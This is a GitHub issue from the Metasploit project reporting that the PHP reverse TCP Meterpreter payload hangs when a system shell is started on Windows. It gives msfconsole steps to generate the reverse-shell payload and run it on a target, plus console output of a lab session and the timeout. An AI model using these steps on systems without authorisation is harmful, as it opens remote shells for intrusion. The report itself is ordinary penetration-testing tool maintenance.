Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

PHP Reverse TCP Meterpreter hangs and timeouts with system command shell #18246

Closed
cdelafuente-r7 opened this issue Aug 2, 2023 · 3 comments
Closed

PHP Reverse TCP Meterpreter hangs and timeouts with system command shell #18246

cdelafuente-r7 opened this issue Aug 2, 2023 · 3 comments
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken

Comments

@cdelafuente-r7
Copy link
Contributor

Steps to reproduce

How'd you do it?

  1. Do: use php/meterpreter/reverse_tcp
  2. Do: set lhost <local IP>
  3. Do: generate -f raw
  4. Copy the generated PHP code
  5. Do: to_handler

On the Windows target:

  1. Open a command line shell (cmd)
  2. Change to the directory where PHP is installed
  3. Run an interactive PHP shell: php.exe -a
  4. Paste the generated PHP code and hit enter

The Meterpreter session is established and works with commands like getuid, sysinfo, ls, ps, etc.
However, when starting a shell with the shell command, it hangs when entering shell commands (timeout).

Expected behavior

Shell commands should execute correctly.

Current behavior

msf6 payload(php/meterpreter/reverse_tcp) >
[*] Sending stage (39927 bytes) to 192.168.100.146
[*] Meterpreter session 5 opened (192.168.100.1:4444 -> 192.168.100.146:50581) at 2023-08-02 14:44:24 +0200

msf6 payload(php/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer    : WIN112H22
OS          : Windows NT WIN112H22 10.0 build 22621 (Windows 11) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username:
meterpreter > shell
Process 10328 created.
Channel 0 created.
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\php>ls
 ---- [hang] ----
Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out

Metasploit version

Framework: 6.3.28-dev-11fb61c3b6
Console  : 6.3.28-dev-11fb61c3b6

Additional Information

I was able to reproduce this issue on both Windows Server 2016 with PHP version 7.4.3 and Windows 11 22H2 with PHP version 8.9.0.
The original PR where this problem was reported: #18211
@sempervictus
Copy link
Contributor

Is it meterp or php on windows that's at fault here?

@github-actions
Copy link

github-actions bot commented Sep 5, 2023

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Sep 5, 2023
@github-actions
Copy link

github-actions bot commented Oct 5, 2023

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot closed this as completed Oct 5, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

No branches or pull requests
2 participants
@sempervictus @cdelafuente-r7